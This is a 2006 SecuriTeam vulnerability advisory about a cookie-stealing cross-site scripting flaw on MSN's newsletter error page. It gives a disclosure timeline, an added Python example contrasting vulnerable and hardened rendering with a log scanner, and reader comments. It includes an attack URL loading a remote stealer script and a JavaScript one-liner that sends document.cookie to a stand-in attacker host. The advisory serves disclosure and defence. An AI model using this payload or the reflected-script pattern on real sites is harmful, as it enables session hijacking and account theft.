A cookie-stealing Cross-site scripting vulnerability was found on MSN's website (msn.com). Using this vulnerability, an attacker could potentially gain access to a victim's Inbox.
Credit:
The vulnerability was discovered by tontonq and Nir Goldshlager.
This information has been provided by SecuriTeam.
Summary
A cookie-stealing Cross-site scripting vulnerability was found on MSN's
website (msn.com). Using this vulnerability, an attacker could potentially
gain access to a victim's Inbox.
This vulnerability was discovered by: tontonq and Nir Goldshlager.
Disclosure timeline
SecuriTeam was asked to assist the researchers with contacting Microsoft.
Reported to vendor: 18th of July, 2006.
Vendor response: 18th of July, 2006.
Resolved: 19th of July, 2006.
Public disclosure: 25th of July, 2006.
Technical description
A cookie-stealing XSS issue was discovered on MSN's web site.
Example of the issue:
http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js
The error page writes the value of the CB query parameter directly into a script tag, so whatever URL the request supplies becomes a script that the victim's browser loads and runs in the msn.com origin.
If John Doe wanted to steal a victim's cookie, he could use this example JavaScript
code:
i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;
If s.php then stores the received cookie value somewhere, the attacker can set
that stored cookie in his own browser and "jump" straight into the victim's Inbox.
For illustration, an older similar issue from 2005 on hotmail.com discovered by Alex de Vries can be found here:
http://www.net-force.nl/files/articles/hotmail_xss/
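The following is an added example, not code from SecuriTeam or from the MSN site, showing the pattern the advisory describes (a request parameter reflected into a script tag's src) next to a hardened version that only ever emits an allowlisted, site-relative script path, plus a small log check that flags requests whose CB parameter points off-site. The render functions, the ALLOWED_SCRIPTS set and the log lines are hypothetical stand-ins constructed for this illustration; only the HMError.asp path and CB parameter name come from the advisory.

```python
"""Reflected parameter in a <script src>: vulnerable vs. hardened rendering,
and a log scan for off-site CB values. Everything here is illustrative."""
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# Hypothetical allowlist of script paths the error page may load.
ALLOWED_SCRIPTS = frozenset({"/hm/error.js", "/hm/callback.js"})


def render_error_page_vulnerable(cb: str) -> str:
    """Reproduces the flaw: the raw CB value becomes the script source."""
    return f'<html><body><script src="{cb}"></script></body></html>'


def is_allowed_script_ref(cb: str) -> bool:
    """Accept only a site-relative path that is on the allowlist.

    Anything with a scheme or host (http://..., //host/...) is rejected,
    as is any path outside ALLOWED_SCRIPTS."""
    parts = urlsplit(cb)
    if parts.scheme or parts.netloc:
        return False
    if "\\" in cb:  # browsers treat backslashes like slashes; refuse them
        return False
    return parts.path in ALLOWED_SCRIPTS


def render_error_page_hardened(cb: str) -> str:
    """Emit the allowlisted path itself (never the raw parameter), HTML-escaped,
    and fall back to a default script when CB is not acceptable."""
    src = urlsplit(cb).path if is_allowed_script_ref(cb) else "/hm/error.js"
    return f'<html><body><script src="{escape(src, quote=True)}"></script></body></html>'


# Constructed access-log lines in Common Log Format (hypothetical hosts/IPs).
SAMPLE_LOG = [
    '10.0.0.1 - - [25/Jul/2006:10:00:00 +0000] "GET /hm/HMError.asp?CB=/hm/error.js HTTP/1.1" 200 512',
    '10.0.0.2 - - [25/Jul/2006:10:00:05 +0000] "GET /hm/HMError.asp?CB=http%3A%2F%2Fexample.invalid%2Fs.js HTTP/1.1" 200 512',
    '10.0.0.3 - - [25/Jul/2006:10:00:09 +0000] "GET /hm/HMError.asp?CB=//example.invalid/s.js HTTP/1.1" 200 512',
    '10.0.0.4 - - [25/Jul/2006:10:00:12 +0000] "GET /hm/index.asp HTTP/1.1" 200 1024',
]

_CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+)')


def find_suspicious_requests(log_lines):
    """Return (client_ip, cb_value) for every HMError.asp request whose CB
    parameter would not pass is_allowed_script_ref."""
    hits = []
    for line in log_lines:
        m = _CLF_RE.match(line)
        if not m:
            continue
        client, target = m.group(1), urlsplit(m.group(2))
        if not target.path.lower().endswith("/hmerror.asp"):
            continue
        for cb in parse_qs(target.query).get("CB", []):  # parse_qs decodes %xx
            if not is_allowed_script_ref(cb):
                hits.append((client, cb))
    return hits


if __name__ == "__main__":
    for client, cb in find_suspicious_requests(SAMPLE_LOG):
        print(f"{client} requested off-site script via CB={cb!r}")
```

The hardened renderer never echoes the request value: it compares the parsed path against a fixed set and emits the matching entry, which removes the reflection rather than trying to filter it. Separately, marking the session cookie HttpOnly would keep document.cookie (which the advisory's payload reads) from exposing it to script at all; that mitigation is not part of this example.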
About SecuriTeam's Assisted Disclosure
Many researchers do not have the time, energy or inclination to deal with
reporting a vulnerability to vendors.
SecuriTeam is here to help. If you want us to handle the logistics of
contacting and following up with the vendor, making sure the problem is
fixed, contact: STAD@SecuriTeam.com.
Our end goal is Full Disclosure, preferably in coordination with the vendor,
without exposing the researcher to unnecessary risk.
We do not believe in hiding or selling vulnerabilities. Never had, never will.
All credit will be properly attributed. If asked we can act as proxies,
keeping your privacy and anonymity.
Subject: so with this
Date: 25 Jul. 2006
From: Josh
Someone can read my email?

Subject: nice
Date: 26 Jul. 2006
From: K1ngw0rm
Very nice work thanx

Subject: Read Mail
Date: 26 Jul. 2006
From: Tontonq
> From: Josh
> Someone can read my email?
If you don't use Live Mail and clicked the XSS link, they may read your mails and change your password :)

Subject: hotmail sucks thanks a lot securiteam
Date: 26 Jul. 2006
From: anoynmous
I don't really like hotmail because they give only 10mb,
but a lot of us use hotmail so I think it's really important that hotmail will fix their holes.
Thanks a lot securiteam for this interesting advisory.

Subject: Nice Expl0itidition
Date: 28 Jul. 2006
From: Spammeanddie
Heyy dude Tontonq, can be a bit nice stuff but you haven't found bypassing filters or exploiting Msn's subdomain image trustability... Yeah it is 0day & underground... & Last keep this up...
You know me...

Subject: thx
Date: 29 Jul. 2006
From: anoynmous
xss closed open ??

Subject: want to learn
Date: 30 Jul. 2006
From: justriugienkjustri_antoyahoo.com
What if I want to learn .... do you think I could join all of you?
Please tell me the trick ??

Subject: hi
Date: 7 Aug. 2006
From: ML3o0o0o0o0o0o0N
ok man

Subject: nice
Date: 9 Aug. 2006
From: al3na
but I think it is closed by hotmail

Subject: a new one exists
Date: 30 Aug. 2006
From: saeel
a new bug of the same type exists